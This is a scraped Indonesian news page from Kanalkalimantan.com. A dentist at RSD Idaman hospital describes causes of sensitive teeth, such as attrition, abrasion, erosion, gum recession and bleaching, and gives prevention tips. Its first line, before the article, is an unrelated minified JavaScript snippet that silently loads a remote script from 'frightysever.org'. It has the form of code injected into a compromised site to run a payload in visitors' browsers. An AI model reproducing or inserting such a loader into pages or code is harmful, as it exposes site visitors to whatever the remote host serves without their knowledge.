(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

RSD Idaman Edukasikan Penyebab Gigi Sensitif dan Solusinya


KANALKALIMANTAN.COM, BANJARBARU – Gigi sensitif adalah rasa ngilu, nyeri, atau tak nyaman pada gigi. Sensasi gigi sensitif ini biasanya muncul saat menyikat gigi atau terpapar suhu dingin atau panas.

Lantas apa penyebabnya? Dokter gigi di Rumah Sakit Daerah (RSD) Idaman, dr Nurul Husna memaparkan penyebab gigi sensitif.

1. Atriasi gigi
Atriasi gigi mengacu pada kerusakan yang membikin mekanisme dasar kontak gigi ke gigi. Ini diakibatkan tekanan dan gesekan saat mengunyah sehingga gigi aus.

2. Abrasi gigi
Ini jenis kerusakan paling sering ditemui. Kondisi ini membuat gesekan benda asik yang merusak email gigi. Biasanya diakibatkan menyikat gigi terlalu kuat dengan bulu keras, menggigit kuku dan merokok.

Baca juga: RSD Idaman Raih Penghargaan Juara 1 Kinerja Penyelenggaraan Pelayanan Publik 2023

3. Erosi gigi.
Erosi gigi biasanya terjadi ketika asam dari saluran pencernaan atau makanan menggerogoti email atau dentin gigi.
Hal ini sering ditemukan di bagian belakang gigi atas. Sebab disitulah lidah bersentuhan dengan gigi.

4. Resesi Gigi
Hal ini mengakibatkan pergeseran atau pergerakan margin gingiva ke arah apkal yang mengakibatkan terbukanya permukaan akar gigi. Sehingga secara estetik tampak tidak indah.

5. Scaling dan Bleaching Gigi
Scaling dan bleaching gigi juga dapat mengakibatkan gigi sensitif. Untuk meredakan sensitif akibat scaling bisa dibantu dengan penggunakan pasta gigi khusus gigi sensitif.
Sedangkan bleaching membuat sensitivitas pada gigi. Hal ini akibat paparan terhadap lapisan dentin gigi saat proses bleaching berlangsung.

6. Hipersensitif Dentin
Terakhir, hipersensitif dentin. Hal ini terjadi ketika adanya perkembangan usia. Menipisnya lapisan enamel gigi membuat gigi semakin terbuka.

Baca juga: Dua Ahli Hukum Berikan Keterangan di Sidang PK Mardani Maming

Untuk, Solusi Gigi Sensitif ada beberapa cara mencegah gigi sensitif. Antara lain memperbaiki atau menyikat gigi, lalu menghindari makanan dan minuman asam, manis dan bersoda. Juga desensitasi atau pemberian lapisan pelindung gigi dan mengurangi menggertakkan gigi. (Kanalkalimantan.com/al)

Reporter: al
Editor: kk


Risa

Recent Posts

Satgas TMMD Bikin Sumur Bor untuk Warga Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pengerjaan sumur bor menjadi salah satu sasaran fisik program TNI Manunggal Membangun… Read More

46 menit ago

Jemaah Termuda Kloter 1 Daftar Haji saat Umur 10 Tahun, Setor 2014 Berangkat 2024

KANALKALIMANTAN.COM, BANJARBARU - Berangkat haji ke Baitullah menunaikan Rukun Islam kelima sepenuhnya adalah panggilan. Berusia… Read More

4 jam ago

Embarkasi Banjarmasin Berangkatkan 5.759 JCH Kalsel-Kalteng, Pelayanan Penuh Jemaah Lansia

KANALKALIMANTAN.COM, BANJARBARU - Sebanyak 4.071 jemaah calon haji (JCH) asal Kalimantan Selatan (Kalsel) akan berangkat… Read More

4 jam ago

Caleg Terpilih Tak Harus Mundur Jika Maju Pilkada, Begini Penjelasan Ketua KPU Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Caleg Anggota Dewan Perwakilan Rakyat (DPR), Anggota Dewan Perwakilan Rakyat Daerah (DPRD)… Read More

6 jam ago

Lepas Keberangkatan 320 Calon Haji, Ini Pesan Bupati Banjar

KANALKALIMANTAN.COM, MARTAPURA - Bagian dalam dan luar halaman Mahligai Sultan Adam di Jalan A Yani… Read More

7 jam ago

Hari Ini Masuk Asrama Haji, Kloter 1 Embarkasi Banjarmasin Berangkat Minggu

KANALKALIMANTAN.COM, BANJARBARU - Jelang kedatangan rombongan jemaah Haji Embarkasi Banjarmasin Kloter 1, Sabtu (11/5/2024), Petugas… Read More

7 jam ago

This website uses cookies.